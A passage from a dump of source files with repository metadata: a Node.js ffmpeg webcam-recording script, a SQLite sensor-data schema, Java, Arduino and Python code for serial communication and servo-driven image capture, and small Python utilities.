"text": "const child_process = require('child_process')\n\nfunction genDateFormatString () {\n var d = new Date()\n return ('00' + (d.getMonth() + 1)).slice(-2) + '-' +\n ('00' + d.getDate()).slice(-2) + '-' +\n d.getFullYear() + '_' +\n ('00' + d.getHours()).slice(-2) + '-' +\n ('00' + d.getMinutes()).slice(-2) + '-' +\n ('00' + d.getSeconds()).slice(-2)\n}\n\nconst cmd = `ffmpeg -f video4linux2 -input_format mjpeg -r 25 -i /dev/video0 \\\n-vf \"drawtext=fontfile=/usr/share/fonts/truetype/dejavu/DejaVuSans-Bold.ttf: \\\ntext='%{localtime\\\\:%T}': [email protected]: x=7: y=210\" -vcodec libx264 \\\n-preset veryfast -f mp4 -pix_fmt yuv420p -y \"${genDateFormatString()}_groundTruth.mp4\"`\n\nchild_process.exec(cmd, (err, stdout, stderr) => {\n if (err) {\n console.log(err)\n }\n if (stdout) {\n console.log(stdout)\n }\n if (stderr) {\n console.log(stderr)\n }\n})\n"
},
{
"alpha_fraction": 0.6555601954460144,
"alphanum_fraction": 0.6730529069900513,
"avg_line_length": 41.122806549072266,
"blob_id": "e2e765251a3f2f66c3281686e464239d67f6ba43",
"content_id": "565eb1f156591e2acaa62a337dd1a5f13f0df6c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 2401,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 57,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer_streamming/dbInit.sql",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "CREATE TABLE IF NOT EXISTS SensorData100Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n sensor_timestamp INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n quat_w REAL NOT NULL,\n quat_x REAL NOT NULL,\n quat_y REAL NOT NULL,\n quat_z REAL NOT NULL,\n gyro_x REAL NOT NULL,\n gyro_y REAL NOT NULL,\n gyro_z REAL NOT NULL,\n lacc_x REAL NOT NULL,\n lacc_y REAL NOT NULL,\n lacc_z REAL NOT NULL,\n acc_x REAL NOT NULL,\n acc_y REAL NOT NULL,\n acc_z REAL NOT NULL\n);\nCREATE TABLE IF NOT EXISTS SensorData20Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n sensor_timestamp INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n mag_x REAL NOT NULL,\n mag_y REAL NOT NULL,\n mag_z REAL NOT NULL\n);\nCREATE TABLE IF NOT EXISTS SensorData1Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n sensor_timestamp INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n temp INTEGER NOT NULL\n);\nCREATE TABLE IF NOT EXISTS SensorFreq(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n frequency INTEGER NOT NULL\n);\n\nCREATE INDEX IF NOT EXISTS sensor_timestamp_100 ON SensorData100Hz(sensor_timestamp);\nCREATE INDEX IF NOT EXISTS server_timestamp_100 ON SensorData100Hz(server_timestamp);\nCREATE INDEX IF NOT EXISTS sensor_timestamp_20 ON SensorData20Hz(sensor_timestamp);\nCREATE INDEX IF NOT EXISTS SensorFreq_server_timestamp ON SensorFreq(server_timestamp);\nCREATE INDEX IF NOT EXISTS server_timestamp_20 ON SensorData20Hz(server_timestamp);\nCREATE INDEX IF NOT EXISTS sensor_timestamp_1 ON SensorData1Hz(sensor_timestamp);\nCREATE INDEX IF NOT EXISTS server_timestamp_1 ON SensorData1Hz(server_timestamp);\nCREATE INDEX IF NOT EXISTS id_100 ON SensorData100Hz(sensor_id, server_id);\nCREATE INDEX IF NOT EXISTS id_20 ON SensorData20Hz(sensor_id, server_id);\nCREATE INDEX IF NOT EXISTS id_1 ON SensorData1Hz(sensor_id, server_id);\nCREATE INDEX IF NOT EXISTS SensorFreq_id ON SensorFreq(sensor_id, server_id)\n"
}
] | 50 |
tk6996/SerialComm
|
https://github.com/tk6996/SerialComm
|
d68d57fb30310802271fe02424d28889eda5c93f
|
43d5f6126124fc21810a81cf8b9ff2b1e1e72a76
|
734385a40c9a71a8a02fdcddc4de6fe379b06c43
|
refs/heads/master
| 2020-09-13T03:51:15.002162 | 2019-11-28T12:49:19 | 2019-11-28T12:49:19 | 222,648,193 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.532260537147522,
"alphanum_fraction": 0.5591830611228943,
"avg_line_length": 28.117116928100586,
"blob_id": "f59d9e30615c51056a5d8170e60c9179b4230e2c",
"content_id": "ce44ef3d6221acf070129b0717850342fd6fa6e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 6463,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 222,
"path": "/src/com/epam/MainProgram.java",
"repo_name": "tk6996/SerialComm",
"src_encoding": "UTF-8",
"text": "package com.epam;\n\nimport java.io.File;\nimport java.io.IOException;\nimport java.io.OutputStream;\nimport java.awt.image.BufferedImage;\nimport java.util.Enumeration;\n\nimport javax.comm.CommPortIdentifier;\nimport javax.comm.UnsupportedCommOperationException;\nimport javax.imageio.ImageIO;\n\npublic class MainProgram {\n\tpublic static char[] angle = new char[3]; // -45* 0* 45*\n\n\tpublic static void main(String[] args) {\n\t\ttry {\n\t\t\tfinal String Arduino2 = \"COM15\";\n\t\t\tfinal String Arduino3 = \"COM14\";\n\t\t\tfinal String Arduino4 = \"COM7\";\n\t\t\tSimpleRead sRead = null;\n\t\t\tControl ctr = null;\n\t\t\tServoControl servo = null;\n\t\t\tfinal Enumeration<?> portList = CommPortIdentifier.getPortIdentifiers();\n\t\t\tCommPortIdentifier pid = null;\n\t\t\twhile (portList.hasMoreElements()) {\n\t\t\t\tpid = (CommPortIdentifier) portList.nextElement();\n\t\t\t\tif (pid.getPortType() == CommPortIdentifier.PORT_SERIAL) {\n\t\t\t\t\tSystem.out.println(\"Port name: \" + pid.getName());\n\n\t\t\t\t\tif (pid.getName().equals(Arduino2)) {\n\t\t\t\t\t\tctr = new Control(pid);\n\t\t\t\t\t}\n\t\t\t\t\tif (pid.getName().equals(Arduino3)) {\n\t\t\t\t\t\tsRead = new SimpleRead(pid);\n\t\t\t\t\t}\n\t\t\t\t\tif (pid.getName().equals(Arduino4)) {\n\t\t\t\t\t\tservo = new ServoControl(pid);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tif (ctr == null || sRead == null || servo == null)\n\t\t\t\tthrow new UnsupportedCommOperationException();\n\t\t\t/*\n\t\t\t * long time = System.currentTimeMillis(); while (System.currentTimeMillis() -\n\t\t\t * time < 5000) {\n\t\t\t * \n\t\t\t * }\n\t\t\t */\n\t\t\tSystem.out.println(\"Ready Command\");\n\t\t\twhile (true) {\n\t\t\t\t// char comm = (char) System.in.read();\n\t\t\t\tchar comm = (char) ctr.waitingStart();\n\t\t\t\t// System.out.println(comm);\n\t\t\t\tif (comm == 'S') {\n\t\t\t\t\tangle[0] = angle[1] = angle[2] = (char) -1;\n\t\t\t\t\tfor (int i = 0; i < 3; i++) {\n\t\t\t\t\t\t// System.out.println(i + (int)'1');\n\t\t\t\t\t\tservo.rotage(i);\n\t\t\t\t\t\tchar type = (char) -1;\n\t\t\t\t\t\tdo {\n\t\t\t\t\t\t\tint[][] data = sRead.readPic();\n\t\t\t\t\t\t\ttype = analysis(data);\n\t\t\t\t\t\t} while (type == (char) -1);\n\t\t\t\t\t\tangle[i] = type;\n\t\t\t\t\t\tSystem.out.println(\"Finish image \" + i);\n\t\t\t\t\t}\n\t\t\t\t\tfor (int i = 0; i < 3; i++) {\n\t\t\t\t\t\tswitch (i) {\n\t\t\t\t\t\tcase 0:\n\t\t\t\t\t\t\tSystem.out.println(\"angle = -45* , type = \" + typeImg(angle[0]));\n\t\t\t\t\t\t\tctr.outputStream.write((byte) 1);\n\t\t\t\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tctr.outputStream.write(angle[0]);\n\t\t\t\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\tcase 1:\n\t\t\t\t\t\t\tSystem.out.println(\"angle = 0* , type = \" + typeImg(angle[1]));\n\t\t\t\t\t\t\tctr.outputStream.write((byte) 2);\n\t\t\t\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tctr.outputStream.write(angle[1]);\n\t\t\t\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\tcase 2:\n\t\t\t\t\t\t\tSystem.out.println(\"angle = 45* , type = \" + typeImg(angle[2]));\n\t\t\t\t\t\t\tctr.outputStream.write((byte) 3);\n\t\t\t\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tctr.outputStream.write(angle[2]);\n\t\t\t\t\t\t\twhile ((char) ctr.waitingStart() != 'A') 
{\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tservo.rotage(1);\n\t\t\t\t}\n\t\t\t\tif (\"TBLRUD\".indexOf(comm) >= 0) {\n\t\t\t\t\tfor (int i = 0; i < 3; i++) {\n\t\t\t\t\t\tif (angle[i] == comm) {\n\t\t\t\t\t\t\tservo.rotage(i);\n\t\t\t\t\t\t\tchar type = (char) -1;\n\t\t\t\t\t\t\tdo {\n\t\t\t\t\t\t\t\tint[][] data = sRead.readPic();\n\t\t\t\t\t\t\t\ttype = analysis(data);\n\t\t\t\t\t\t\t} while (type != angle[i]);\n\t\t\t\t\t\t\tsendDataPixel(ctr);\n\t\t\t\t\t\t\t// sendDataPixel(System.out);\n\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tSystem.out.println(\"Finish Send Data\");\n\t\t\t\t}\n\t\t\t}\n\t\t} catch (Exception e) {\n\t\t\te.printStackTrace();\n\t\t}\n\t}\n\n\tpublic static char analysis(int[][] data /* coordinate [y][x] */) {\n\t\t// System.out.println(data.length + \" \" + data[0].length);\n\t\t// pixelAnalysis coordinate [x][y]\n\t\tint[][] pixelAnalysis = { { 23, 68 }, // triangle lower left\n\t\t\t\t{ 68, 23 }, // triangle upper left\n\t\t\t\t{ 135, 45 }, // upper right\n\t\t\t\t{ 45, 135 }, // lower left\n\t\t\t\t{ 113, 158 }, // triangle lower right\n\t\t\t\t{ 158, 113 } }; // triangle upper right\n\t\tint collectWhite = 0; // check error\n\t\tfor (int i = 0; i < 6; i++) {\n\t\t\tif (data[pixelAnalysis[i][1]][pixelAnalysis[i][0]] != data[pixelAnalysis[i][1]][pixelAnalysis[i][0] - 1]\n\t\t\t\t\t&& data[pixelAnalysis[i][1]][pixelAnalysis[i][0]] != data[pixelAnalysis[i][1]][pixelAnalysis[i][0]\n\t\t\t\t\t\t\t+ 1]) {\n\t\t\t\tSystem.out.println(\"Image Error at x = \" + pixelAnalysis[i][0] + \" y = \" + pixelAnalysis[i][1]);\n\t\t\t\treturn (char) -1;\n\t\t\t}\n\t\t}\n\t\tfor (int i = 0; i < pixelAnalysis.length; i++)\n\t\t\tcollectWhite |= ((data[pixelAnalysis[i][1]][pixelAnalysis[i][0]] > 0 ? 
1 : 0) << i);\n\t\tif (collectWhite == 0b000111)\n\t\t\treturn 'T';\n\t\telse if (collectWhite == 0b111000)\n\t\t\treturn 'B';\n\t\telse if (collectWhite == 0b001011)\n\t\t\treturn 'L';\n\t\telse if (collectWhite == 0b110100)\n\t\t\treturn 'R';\n\t\telse if (collectWhite == 0b100110)\n\t\t\treturn 'U';\n\t\telse if (collectWhite == 0b011001)\n\t\t\treturn 'D';\n\t\telse {\n\t\t\tSystem.out.println(\"Error Detect Value : \" + Integer.toBinaryString(collectWhite));\n\t\t\treturn (char) -1;\n\t\t}\n\n\t}\n\n\tpublic static void sendDataPixel(Control ctr) throws IOException {\n\n\t\tSystem.out.println(\"Waiting\");\n\t\tBufferedImage buf = ImageIO.read(new File(\"c:/datacom/use/raw.bmp\"));\n\n\t\tfor (int i = 1; i < 5; i++) {\n\t\t\tfor (int j = 1; j < 5; j++) {\n\t\t\t\tSystem.out.println(\"Pos x = \" + j * buf.getWidth() / 5 + \" Pos y = \" + i * buf.getHeight() / 5\n\t\t\t\t\t\t+ \" PixelValue = \" + (buf.getRGB(j * buf.getWidth() / 5, i * buf.getHeight() / 5) & 0xFF));\n\n\t\t\t\tctr.outputStream.write((byte) (0x1F & (byte) (j * buf.getWidth() / 5)));\n\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t}\n\t\t\t\tctr.outputStream.write((byte) ((0xF & (byte) ((j * buf.getWidth() / 5) >> 5))));\n\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t}\n\t\t\t\tctr.outputStream.write((byte) (0x1F & (int) (i * buf.getHeight() / 5)));\n\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t}\n\t\t\t\tctr.outputStream.write((byte) ((0xF & (byte) ((i * buf.getHeight() / 5) >> 5))));\n\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t}\n\t\t\t\tctr.outputStream.write((byte) (buf.getRGB(j * buf.getWidth() / 5, i * buf.getHeight() / 5) & 0xFF));\n\t\t\t\twhile ((char) ctr.waitingStart() != 'A') {\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\t// return;*/\n\t}\n\n\tpublic static String typeImg(char t) {\n\t\tString type = null;\n\t\tswitch (t) {\n\t\tcase 'T':\n\t\t\ttype = \"Top\";\n\t\t\tbreak;\n\t\tcase 'B':\n\t\t\ttype = \"Bottom\";\n\t\t\tbreak;\n\t\tcase 'L':\n\t\t\ttype = \"Left\";\n\t\t\tbreak;\n\t\tcase 'R':\n\t\t\ttype = \"Right\";\n\t\t\tbreak;\n\t\tcase 'U':\n\t\t\ttype = \"Upper\";\n\t\t\tbreak;\n\t\tcase 'D':\n\t\t\ttype = \"Lower\";\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tbreak;\n\t\t}\n\t\treturn type;\n\t}\n\n}"
},
{
"alpha_fraction": 0.5730858445167542,
"alphanum_fraction": 0.6148492097854614,
"avg_line_length": 18.590909957885742,
"blob_id": "6abd1d376437f61100fc4abd405291c0f6b2919e",
"content_id": "5a71824498336253b71ba50504323fdc917d677a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 22,
"path": "/bin/ServoControl/ServoControl.ino",
"repo_name": "tk6996/SerialComm",
"src_encoding": "UTF-8",
"text": "#include <Servo.h>\nServo Horizontal = Servo();\nServo Vertical = Servo();\nvoid setup() {\n Serial.begin(9600);\n Horizontal.attach(9);\n Vertical.attach(10);\n Vertical.write(150);\n Horizontal.write(90);\n}\n\nvoid loop() {\n if (Serial.available() > 1)\n {\n switch(Serial.read())\n {\n case 1 : Horizontal.write((int)Serial.read()); break;\n case 2 : Vertical.write((int)Serial.read()); break;\n }\n }\n delay(100);\n}\n"
},
{
"alpha_fraction": 0.438800185918808,
"alphanum_fraction": 0.45476534962654114,
"avg_line_length": 49.414634704589844,
"blob_id": "a9202581407da3519a5642f73deb787c0792efac",
"content_id": "96be978da2d0a69c07a769db82c8c8665958819d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2067,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 41,
"path": "/bin/InputPC1.py",
"repo_name": "tk6996/SerialComm",
"src_encoding": "UTF-8",
"text": "import serial\nimport sys\nportName = \"COM16\"\nif __name__ == \"__main__\":\n try:\n myserial = serial.Serial(portName, 9600)\n state = 0\n type_img = {'T': \"Top\", 'B': \"Bottom\", 'L': \"Left\",\n 'R': \"Right\", 'U': \"Upper\", 'D': \"Lower\"}\n img_angle = []\n while True:\n print(\"--------------------------------\")\n command = input(\n \"Enter \\\"Start\\\" for Activate\\n\" if state ==\n 0 else \"Enter Type Image for Capture and Receive Data\\n\" + img_angle.__str__() + \"\\n\")\n if state == 0 and command.lower() == \"start\":\n myserial.write(ord('S').to_bytes(1,\"big\"))\n img_angle = []\n for _ in range(3):\n angle = int.from_bytes(myserial.read(), \"big\")\n angle = angle if angle < 128 else - (256 - angle)\n typeImgage = type_img[myserial.read().decode(\"utf-8\")]\n print(\"Angle\", angle.__str__().center(\n 5), \"Type Image\", typeImgage)\n img_angle.append(typeImgage)\n state = 1\n elif state == 1 and command in img_angle:\n for key, value in type_img.items():\n if value.lower() == command.lower():\n myserial.write(ord(key).to_bytes(1,\"big\"))\n for c in range(16):\n posx = ((0x1F & int.from_bytes(myserial.read(),\"big\") | (int.from_bytes(myserial.read(),\"big\") & 0xF) << 5))\n posy = ((0x1F & int.from_bytes(myserial.read(),\"big\") | (int.from_bytes(myserial.read(),\"big\") & 0xF) << 5))\n mypixelValue = int.from_bytes(myserial.read(),\"big\")\n print(\"pixel x = \",posx,\"pixel y = \",posy,\"pixel value =\",mypixelValue)\n state = 0\n else:\n print(\"Command is not correct re-Enter for Active\")\n\n except serial.SerialException:\n print(\"Port busy\", file=sys.__stderr__)\n"
}
] | 3 |
lnandi1/Test_repository
|
https://github.com/lnandi1/Test_repository
|
3f1d6e1e779ddbf4c61ed41e563d59e8059964a0
|
b471aeafa7cf6e7a642f6d58ec91ec7b94bcde6c
|
ab48bebc63419f108cd360b6f0ab5a446148c51b
|
refs/heads/master
| 2020-03-29T10:16:58.933385 | 2019-07-22T13:57:10 | 2019-07-22T13:57:10 | 149,797,351 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5377643704414368,
"alphanum_fraction": 0.5579053163528442,
"avg_line_length": 22.04878044128418,
"blob_id": "73acb052e2002bb3fe86da5bb39793b1a15513f4",
"content_id": "3d46e506e66a1070e692817abe587a70fc195b2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 993,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 41,
"path": "/Answers_to_Functions.py",
"repo_name": "lnandi1/Test_repository",
"src_encoding": "UTF-8",
"text": "'''\r\nConverting currenices\r\nMiles and Kilometers\r\nKilograms and Pounds\r\nCelsius and Fahrenheit\r\n\r\n'''\r\ndef print_menu():\r\n print('1. British Pounds to US Dollars')\r\n print('2. British Pounds to Euros')\r\n print('3. British Pounds to Yens')\r\n \r\ndef Pounds_Dollars():\r\n Pounds = float(input('Enter Pounds: '))\r\n Dollars = Pounds * 1.28\r\n print('Amount in Dollars is: ',round(Dollars,2))\r\n\r\ndef Pounds_Euros():\r\n Pounds = float(input('Enter Pounds: '))\r\n Euros = Pounds * 1.19\r\n print('Amount in Euros is: ',round(Euros,2))\r\n\r\ndef Pounds_Yens():\r\n Pounds = float(input('Enter Pounds: '))\r\n Yen = Pounds * 139.79\r\n print('Amount in Yens is:',round(Yen,2)) \r\n \r\n\r\n\r\ndef main():\r\n print_menu()\r\n choice = input('Which conversion would you like to do? ')\r\n\r\n if choice == '1':\r\n Pounds_Dollars()\r\n if choice == '2':\r\n Pounds_Euros()\r\n if choice == '3':\r\n Pounds_Yens()\r\n\r\nmain()\r\n\r\n \r\n"
},
{
"alpha_fraction": 0.5079872012138367,
"alphanum_fraction": 0.5447284579277039,
"avg_line_length": 17.4375,
"blob_id": "8ab0bb38c56de80fb5890e46b1113d5d5eb67a04",
"content_id": "590c24bf6e11ab34beed944d1176c05929bb55ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 626,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 32,
"path": "/Return_routine.py",
"repo_name": "lnandi1/Test_repository",
"src_encoding": "UTF-8",
"text": "'''\r\ndef Addition(apples,bananas):\r\n total = apples + bananas\r\n print(total)\r\n\r\nAddition(100, 200)\r\nAddition(200,400)\r\n\r\n\r\ndef Addition_more(apples,bananas):\r\n total = apples + bananas\r\n return total\r\n\r\n\r\nSum = Addition_more(99, 888)\r\nprint(Sum)\r\n\r\n\r\ndef Multiplication(apples,bananas):\r\n total = apples * bananas\r\n return total\r\n\r\nProduct = Multiplication(12,5)\r\nprint(Product)\r\n'''\r\n\r\ndef Subtraction(apples,bananas):\r\n total = apples - bananas\r\n return total\r\n\r\nSum = Subtraction(6,21)\r\nprint(Sum)\r\n\r\n\r\n"
}
] | 2 |
Zainabalabi/mini-project-on-self-efficacy-instrument
|
https://github.com/Zainabalabi/mini-project-on-self-efficacy-instrument
|
4cef94a40948bb45d834984818f7f77bdfc080b7
|
856be90c4dad0bbcd9bff78b99422ba2de2286de
|
fec9b5151c47167acb9db3ca80dcaeb7a8bf7fc6
|
refs/heads/master
| 2020-04-11T02:56:58.446025 | 2018-12-12T09:21:11 | 2018-12-12T09:21:11 | 161,461,292 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5932499766349792,
"alphanum_fraction": 0.6222500205039978,
"avg_line_length": 28.78294563293457,
"blob_id": "61ac0fbf0cb4bd2ae487704440946c4fb6952d6e",
"content_id": "c6d21b36666917b23a676bed23e5e3497da0fe56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4000,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 129,
"path": "/Self-efficacy test.py",
"repo_name": "Zainabalabi/mini-project-on-self-efficacy-instrument",
"src_encoding": "UTF-8",
"text": "name =(input(\"Enter your name here:\"))\r\n\r\nprint(\"Welcome\", name,\"! you are about to take a General Self-efficacy test.\")\r\n\r\nprint(\"Input the option that best describes your answer. \\na = Not at all true \\nb = Hardly true \\nc = Moderately true \\nd = Exactly true\")\r\n\r\nprint(\"Please note that there is no right or wrong answer, all options are valid.\")\r\n\r\n\r\n\r\na = 1\r\nb = 2\r\nc = 3\r\nd = 4\r\n\r\nscore = 0\r\n\r\n\r\nquestion1= input(\"I can always manage to solve difficult problems if I try hard enough. \\n\")\r\nif(question1 ==\"a\"):\r\n score = score + 1\r\nelif(question1 ==\"b\"):\r\n score = score + 2\r\nelif(question1 ==\"c\"):\r\n score = score + 3\r\nelif(question1 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion2= input(\"If someone opposes me, I can find the means and ways to get what I want. \\n\")\r\nif(question2 ==\"a\"):\r\n score = score + 1\r\nelif(question2 ==\"b\"):\r\n score = score + 2\r\nelif(question2 ==\"c\"):\r\n score = score + 3\r\nelif(question2 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion3= input(\"It is easy for me to stick to my aims and accomplish my goals. \\n\")\r\nif(question3 ==\"a\"):\r\n score = score + 1\r\nelif(question3 ==\"b\"):\r\n score = score + 2\r\nelif(question3 ==\"c\"):\r\n score = score + 3\r\nelif(question3 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion4= input(\"I am confident that I could deal efficiently with unexpected events. \\n\")\r\nif(question4 ==\"a\"):\r\n score = score + 1\r\nelif(question4 ==\"b\"):\r\n score = score + 2\r\nelif(question4 ==\"c\"):\r\n score = score + 3\r\nelif(question4 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion5= input(\"Thanks to my resourcefulness, I know how to handle unforeseen situations. \\n\")\r\nif(question5 ==\"a\"):\r\n score = score + 1\r\nelif(question5 ==\"b\"):\r\n score = score + 2\r\nelif(question5 ==\"c\"):\r\n score = score + 3\r\nelif(question5 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion6= input(\"I can solve most problems if I invest the necessary effort. \\n\")\r\nif(question6 ==\"a\"):\r\n score = score + 1\r\nelif(question6 ==\"b\"):\r\n score = score + 2\r\nelif(question6 ==\"c\"):\r\n score = score + 3\r\nelif(question6 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion7= input(\"I can remain calm when facing difficulties because I can rely on my coping abilities. \\n\")\r\nif(question7 ==\"a\"):\r\n score = score + 1\r\nelif(question7 ==\"b\"):\r\n score = score + 2\r\nelif(question7 ==\"c\"):\r\n score = score + 3\r\nelif(question7 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion8= input(\"When I am confronted with a problem, I can usually find several solutions. \\n\")\r\nif(question8 ==\"a\"):\r\n score = score + 1\r\nelif(question8 ==\"b\"):\r\n score = score + 2\r\nelif(question8 ==\"c\"):\r\n score = score + 3\r\nelif(question8 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion9= input(\"If I am in trouble, I can usually think of a solution. \\n\")\r\nif(question9 ==\"a\"):\r\n score = score + 1\r\nelif(question9 ==\"b\"):\r\n score = score + 2\r\nelif(question9 ==\"c\"):\r\n score = score + 3\r\nelif(question9 ==\"d\"):\r\n score = score + 4\r\n\r\nquestion10= input(\"I can usually handle whatever comes my way. 
\\n\")\r\nif(question10 ==\"a\"):\r\n score = score + 1\r\nelif(question10 ==\"b\"):\r\n score = score + 2\r\nelif(question10 ==\"c\"):\r\n score = score + 3\r\nelif(question10 ==\"d\"):\r\n score = score + 4\r\n\r\n \r\nprint(\"You got \", score,\".\")\r\n\r\nif score>=10 and score<=20:\r\n print(\"Dear\",name,\", the test result indicates that you have a low percieved self-efficacy. However, this can be enhanced by working on self perception and motivation and social influences arounnd you.\")\r\nelif score>=21 and score<=27:\r\n print(\"Dear\",name,\", the test results indacates that you have a fair percieved self-efficacy, which can be enhanced by consciously working on social influence and self motivation.\")\r\nelif score>=28 and score<=34:\r\n print(\"Dear\",name,\", the test result indicates that you have a good percieved self-efficacy, Weldone! \")\r\nelif score>=35 and score<=40:\r\n print(\"Dear\",name,\", the test result indicates that you have a high perceived self-efficacy, Great!\")\r\n \r\n \r\n"
},
{
"alpha_fraction": 0.8333333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 42,
"blob_id": "49de0b3f09f0ea8c1c45cf60323774c7a798a84b",
"content_id": "3b6571595ec38af738cc6b41ce05f8c51adf0079",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 42,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 1,
"path": "/README.md",
"repo_name": "Zainabalabi/mini-project-on-self-efficacy-instrument",
"src_encoding": "UTF-8",
"text": "# mini-project-on-self-efficacy-instrument"
}
] | 2 |
winnersguard/mtgpy
|
https://github.com/winnersguard/mtgpy
|
cd9b95a88ce3d474f1cb74979a7d5a0923ceb34a
|
4164d434de18f9342c3773c05a923d2dc784e34d
|
45950d64b663611f0f8639cfa96d87b73f9b0819
|
refs/heads/master
| 2019-07-22T17:55:04.328555 | 2016-04-02T08:44:21 | 2016-04-02T08:44:21 | 55,630,510 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5877193212509155,
"alphanum_fraction": 0.5877193212509155,
"avg_line_length": 35,
"blob_id": "ee5a78ee18b239508c32b94c90ef829e8d18f8b8",
"content_id": "70ab36d65433ead32929a6c43b865cf232b6577b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 114,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 3,
"path": "/readInthenOut.py",
"repo_name": "winnersguard/mtgpy",
"src_encoding": "UTF-8",
"text": "\n\nwith open('inputfile.txt', 'r') as infile:\n\twith open('outfile.txt', 'w') as f:\n \t\tf.write(infile.read())\n \n"
},
{
"alpha_fraction": 0.5031446814537048,
"alphanum_fraction": 0.5110062956809998,
"avg_line_length": 23.461538314819336,
"blob_id": "f312af630ce8c210572ca471bff07190b7ecacb3",
"content_id": "14ab581609971e78c6f7c16ef91d1fff1afc7e03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 636,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 26,
"path": "/splitter.py",
"repo_name": "winnersguard/mtgpy",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python2\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\nimport sys\n\ndef main( args ):\n with open(args[1], 'r') as infile:\n for line in infile:\n num, let = splitter(line)\n print \"numbers: \", num\n print \"letters: \", let\ndef splitter( s ):\n arr = s.split(',')\n nums = []\n letters = []\n for i in arr:\n txt = i.strip()\n if txt.isdigit():\n nums.append(txt)\n elif txt.isalpha():\n letters.append(txt)\n else:\n print txt, \" is neither\"\n return(nums, letters)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n"
},
{
"alpha_fraction": 0.5299999713897705,
"alphanum_fraction": 0.5364285707473755,
"avg_line_length": 23.561403274536133,
"blob_id": "f47820cb44b121856bc2096d9cef34778b847efb",
"content_id": "3fdad44c67390dd353dc6b49f040ccae8f03d06b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1400,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 57,
"path": "/Card.py",
"repo_name": "winnersguard/mtgpy",
"src_encoding": "UTF-8",
